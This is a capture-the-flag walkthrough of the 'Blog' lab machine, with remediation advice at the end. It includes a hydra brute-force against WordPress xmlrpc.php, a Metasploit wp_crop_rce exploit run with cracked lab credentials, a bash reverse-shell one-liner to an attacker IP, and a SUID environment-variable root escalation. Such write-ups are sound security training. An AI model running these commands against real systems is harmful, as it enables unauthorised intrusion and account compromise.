Target IP: blog.thm (Requires /etc/hosts entry) Difficulty: Medium Objective: User (user.txt) & Root (root.txt) Flags

1. Executive Summary

The “Blog” machine is a Linux server hosting a WordPress 5.0 instance. Initial enumeration reveals an exposed SMB share containing media files (likely steganography rabbit holes). The primary vector involves identifying valid users via WordPress enumeration and brute-forcing their credentials using the XML-RPC interface. With valid credentials (Author role), we chain CVE-2019-8942 and CVE-2019-8943 (WordPress Crop RCE) to gain remote code execution. Privilege escalation is achieved by reverse-engineering a custom SUID binary (checker) which grants root access if a specific environment variable is set.

Key TTPs (MITRE ATT&CK):

  • T1595 (Active Scanning): Nmap & SMBMap.
  • T1110 (Brute Force): Credential stuffing via xmlrpc.php.
  • T1190 (Exploit Public-Facing App): Exploiting WordPress Core (Image Crop RCE).
  • T1548 (Abuse Elevation Control Mechanism): Exploiting a custom SUID binary via environment variable injection.

2. Operational Setup

Host Configuration

echo "10.10.x.x blog.thm" | sudo tee -a /etc/hosts

Workspace (Tmux)

  • Pane 1 (Recon): nmap, wpscan, hydra.
  • Pane 2 (Exploit): msfconsole.
  • Pane 3 (Shell): Netcat listeners.

3. Enumeration: “What do we see?”

A. Network Scanning

We start with Nmap.

nmap -sC -sV -oA nmap/blog blog.thm

Results:

  • 22/tcp (SSH): OpenSSH 7.6p1.
  • 80/tcp (HTTP): Apache 2.4.29 running WordPress 5.0.
  • 139/445 (SMB): Samba (Workgroup).

B. SMB Enumeration

We verify the SMB shares immediately.

smbmap -H blog.thm

Findings:

  • Share: BillySMB (Read/Write).
  • Files: Alice-White-Rabbit.jpg, tswift.mp4, check-this.png.

Analysis (The Rabbit Hole): While these files scream “Steganography,” in a real-world assessment (and high-quality boxes), stego is rare unless it’s a CTF specific challenge. We note them, download them just in case (smbclient //blog.thm/BillySMB), but do not spend hours analyzing bits unless the web vector fails.

C. Web Enumeration (WordPress)

We know it is WordPress 5.0. This is an old version (2018/2019 era) and highly likely vulnerable.

1. User Enumeration: We can use wpscan to enumerate users.

wpscan --url http://blog.thm --enumerate u
  • Users Found: kwheel, bjoel.

2. Credential Brute-Forcing (The Key Step): You correctly identified that the RCE requires authentication (usually Author+ privileges). We use hydra to attack the xmlrpc.php endpoint, which is faster and often less rate-limited than the main login page.

hydra -L users.txt -P /opt/rockyou.txt blog.thm http-post-form "/xmlrpc.php:<?xml version='1.0'?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>^USER^</string></value></param><param><value><string>^PASS^</string></value></param></params></methodCall>:Invalid"

Success:

  • User: kwheel
  • Password: cutiepie1

4. Initial Access: WordPress Crop RCE

The Vulnerability (CVE-2019-8942 & CVE-2019-8943)

WordPress 5.0 has a logic flaw in how it handles image cropping.

  1. LFI: Allows a user to reference a file via path traversal (CVE-2019-8942).
  2. RCE: Allows a user to write the cropped image data into the image file itself. By injecting PHP code into the EXIF data of an image and then cropping it, the PHP code is preserved and executed when the file is included.

Exploitation via Metasploit

Since manual exploitation of this chain is complex (involves crafting specific EXIF data), Metasploit is the efficient choice here.

msfconsole
use exploit/multi/http/wp_crop_rce
set RHOSTS blog.thm
set USERNAME kwheel
set PASSWORD cutiepie1
set LHOST 10.10.x.x
run

Result: Meterpreter session opened. Stabilization:

shell
/bin/bash -c 'bash -i >& /dev/tcp/10.10.x.x/9001 0>&1'

We are now www-data.


5. Privilege Escalation: SUID checker

Enumeration

We run a standard SUID search.

find / -perm -u=s -type f 2>/dev/null

Output:

/usr/sbin/checker   <-- NOT STANDARD
/usr/bin/passwd
/usr/bin/sudo
...

A binary named checker in /usr/sbin is highly suspicious.

Reverse Engineering

We need to understand what this binary does.

  1. Basic Execution:
/usr/sbin/checker
# Output: "Not an Admin"
  1. Static Analysis (strings): Running strings on a binary prints all printable characters. This is the fastest way to spot hardcoded variables.
strings /usr/sbin/checker

Output:

getenv
admin
/bin/bash
setuid

Analysis:

  • getenv: It’s looking for an environment variable.
  • admin: Likely the name of the variable.
  • /bin/bash + setuid: If the condition is met, it spawns a root shell.
  1. Dynamic Analysis (ltrace - Optional): If strings wasn’t clear, ltrace /usr/sbin/checker would show the library call getenv("admin").

Exploitation

We simply set the environment variable that the binary checks for. The value likely doesn’t matter, it just checks for existence or a generic truthy value, but admin is a safe guess.

export admin=admin
/usr/sbin/checker

Result:

# whoami
root

Flags:

  • User: /home/bjoel/user.txt (or /media/usb/user.txt)
  • Root: /root/root.txt

6. Remediation (Blue Team)

  1. Patch WordPress: Update to the latest version immediately. WordPress 5.0 is critically vulnerable.
  2. Disable XML-RPC: If remote publishing is not needed, block access to xmlrpc.php via web server config (Apache/Nginx) to prevent brute-force attacks.
  3. Audit SUID Binaries:
  • Custom binaries like checker should generally not have the SUID bit set unless absolutely necessary.
  • Using environment variables for authentication in SUID binaries is insecure because any user can set them.